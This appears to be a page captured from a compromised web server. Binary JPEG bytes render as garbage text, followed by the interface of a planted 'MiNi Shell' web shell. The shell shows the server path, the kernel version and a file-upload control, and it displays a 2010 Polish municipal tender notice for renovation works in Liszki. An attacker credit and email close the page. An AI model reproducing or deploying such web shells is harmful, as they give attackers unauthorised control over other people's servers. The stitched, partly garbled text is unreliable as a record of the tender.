JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100309/52309-N-2010.html

<p class="kh_header"><b>Liszki: Rewitalizacja rynku oraz odnowa budynków użyteczności publicznej w miejscowości Liszki</b><br>
<b>Numer ogłoszenia: 52309 - 2010; data zamieszczenia: 09.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Liszki , 230, 32-060 Liszki, woj. małopolskie, tel. 012 280-62-34, faks 012 280-62-52.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.liszki.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja rynku oraz odnowa budynków użyteczności publicznej w miejscowości Liszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie zadania  pn. Rewitalizacja rynku oraz odnowa budynków użyteczności publicznej w miejscowości Liszki
Zakres  robót ww. zadania obejmuje:
1)	Remont placu przy Kościele:
a.	remont parkingu - ułożenie nawierzchni z kostki betonowej wibroprasowanej              (typ starobruk) koloru szarego, gr. 8 cm - 651,8 m2,
b.	remont chodnika, otoczenie pomnika
- ułożenie nawierzchni wokół pomnika z kostki bazaltowej - 26,04 m2
- ułożenie nawierzchni z kostki betonowej  wibroprasowanej (typ starobruk) koloru szarego, gr. 6 cm - 57,40 m2,
c. remont schodów - wykonanie (obłożenie) istniejących schodów kostką brukową           gr. 6 cm - 22,0 m2,
d. uporządkowanie terenu wokół pomnika,
e. budowa małej architektury:
- ławki  - blok granitowy ciosany o wym. 50x50x150 cm z siedziskiem drewnianym - 2 szt.
  - kosze na śmieci drewniane z wkładem z blachy ocynkowanej 44x44x60 cm - 2 szt.,
  - ogrodzenie wys. 80 cm stalowe kute z czarnej stali profilowej - 103 m,
f. wykonanie robót towarzyszących
Wykonanie robót, zgodnie z załączonym przedmiarem robót,
2)  Remont budynku GOK:
     a. osuszanie budynku - 155 m2,
     b. renowacja betonowych obramowań lukarn piwnicznych - 12,50 m2,
     c. wykonanie elewacji - ocieplenie ścian płytami styropianowymi - 305,41 m2,
     d. wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych - 318,62 m2,
     e.  remont kominów,
     f.   remont dachu - malowanie - 201,30 m2,
     g. wykonanie robót towarzyszących,
Wykonanie robót zgodnie z załączonym przedmiarem robót,
3) Budowa ogrodzenia
     a. ogrodzenie wykonane z płyt OSB na konstrukcji stalowej pokryte tynkiem akrylowym - 9,28 m,

4) Wykonanie placu zabaw przy szkole w Liszkach.
    a. wyposażenie placu zabaw (dostawa wraz z montażem):
    - piaskownica 3,10 m x 3,10 m - 1 szt.
    - huśtawka - 2 szt.
    - ławka  metalowa 1,90 x 0,5 x 0,6 - 2 szt.
    - kosz na śmieci 0,6 x 0,6 m - 2 szt.
    - zestaw zabawowy - 1 szt.
    - stojak na rowery - sprężyna - 1 szt. 
    b. remont ogrodzenia - 193,80 m2,
c. wykonanie robót towarzyszących,
  Wykonanie robót zgodnie z załączonym przedmiarem robót,
d. Wykonawca zobowiązany jest dostarczyć wymagane atesty i certyfikaty na   
    elementy wyposażenia placu zabaw.
 2.   Całość materiałów oraz środków technicznych niezbędnych do wykonania zamówienia   
       dostarcza Wykonawca.
3.	Szczegółowy zakres robót zawiera dokumentacja techniczna, specyfikacje techniczne oraz przedmiar robót.
4.	Wykonanie tablic informujących o finansowaniu operacji ze środków Unii Europejskiej  - 4 szt.
5.	Należy przyjąć materiały zgodnie z przedmiarem robót lub inne o co najmniej  takich samych lub lepszych parametrach.
6.	Kolor elewacji  oraz dachu do uzgodnienia z Inwestorem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.22.33.00-9, 45.34.20.00-6, 45.26.12.21-9, 45.32.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium.  
1.	Każdy Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
    5 000,00 zł (słownie: pięć tysięcy złotych).  
   Wadium może być wnoszone w jednej lub w kilku formach określonych w art. 45 ust. 6   
    ustawy.
2.	Do oferty należy dołączyć dokument potwierdzający wniesienie wadium przez wykonawcę tzn.:
a)  oryginał lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu na konto   
     (warunek konieczny, ale nie wystarczający do stwierdzenia przez Zamawiającego   
     terminowego wniesienia wadium za pomocą przelewu bankowego);
b)  oryginał dokumentu będącego każdą inną formą wadium dopuszczoną przez  
      Zamawiającego.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a). nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),   
     gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie   
     ich siedzib,
b).  określenie wierzytelności, która ma być zabezpieczona gwarancją,
c).  kwotę gwarancji,
d).  termin ważności gwarancji,
e).   bezwarunkowe, zobowiązanie gwaranta do: zapłacenia pełnej kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego, zgłoszone w terminie związania ofertą, zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
	- odmówił podpisania umowy na warunkach określonych w ofercie lub
      - nie wniósł zabezpieczenia należytego wykonania umowy lub
       - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
4.	Postanowienia roz. V. pkt.3 SIWZ stosuje się odpowiednio do poręczeń, o których mowa                w art. 45 ust. 6 pkt 2) i 5) ustawy Pzp.
5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na konto zamawiającego                         KBS O Liszki 71 8591 0007 0210 0000 0068 0014: z adnotacją Rewitalizacja rynku                   oraz odnowa budynków użyteczności publicznej w miejscowości Liszki, a kopię dokumentu przelewu należy dołączyć do oferty.
6.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert,               przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
7.	Wniesienie wadium w innej formie niż pieniądz Zamawiający będzie uważał za skuteczne tylko wówczas, gdy w terminie otwarcia oryginał dokumentu znajdował się będzie                    w ofercie.
8.	Wadium winno być wniesione na okres związania ofertą określony w roz. XVII SIWZ. Zamawiający za datę wniesienia wadium uważa datę uznania wskazanego rachunku bankowego (tj. datę faktycznego wpływu środków finansowych na konto Zamawiającego).
9.	 Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą          
 wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
10.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
11.	Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z dyspozycją art. 46 ust. 5 ustawy.
12.	Zamawiający zwróci wadium według zasad określonych w art. 46 ust. 1-4 ustawy Pzp                z zastrzeżeniem art.46 ust. 4a ustawy Pzp tj. Zamawiający zatrzymuje wadium                         wraz z odsetkami jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa                           w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia czyli:

wykonali co najmniej 1 robotę budowlaną w okresie ostatnich 5 lat                    
          przed upływem terminu składania ofert (a jeżeli okres prowadzenia   
          działalności jest krótszy w tym okresie) w zakresie termomodernizacji   
          budynków oraz prac brukarskich  o łącznej wartości  tych dwóch robót równej                             
          lub większej 200,000 zł (słownie: dwieście tysięcy złotych)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie sprzętu potrzebnego do wykonania ww. zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pismo przewodnie - Oferta
2. Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik
3. Kosztorys ofertowy sporzadzony na podstawie przedmiaru robót
4.Dowód wniesienia wadium
5.Informacja o zakresie robót, których wykonanie wykonawca powierzy podwykonawcom (zał. nr 7 do SIWZ)
6.	Wypełniony i zaakceptowany projekt umowy (zał. nr 8 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszczalne są nieistotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
2.	Strony dopuszczają wprowadzenie do treści niniejszej umowy istotnych zmian jej postanowień w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
3.	Zmiany  o których mowa w ust. 2 mogą dotyczyć:
- terminu wykonania przedmiotu zamówienia, którego przedłużenie powodowane jest    
 przyczynami niezależnymi od stron,
  - zakresu robót budowlanych, organizacji robót,  z przyczyn niezależnych od stron
  - zmian, do których strony upoważnione są na podstawie ustawy lub niniejszej umowy,
4.	Zmiany w umowie mogą zostać dokonane wyłącznie za zgodą obu stron w formie pisemnej pod rygorem nieważności.
5.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie   
leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości                            o tych okolicznościach. W takim wypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu  wykonania części umowy.
6.	Wykonanie części umowy o którym mowa w ust. 5 wykonawca potwierdza w protokole.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.liszki.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Liszki, Liszki 230, pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2010 godzina 09:45, miejsce: Dziennik Podawczy Urzędu Gminy Liszki, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> środki Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich. Program - Program Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com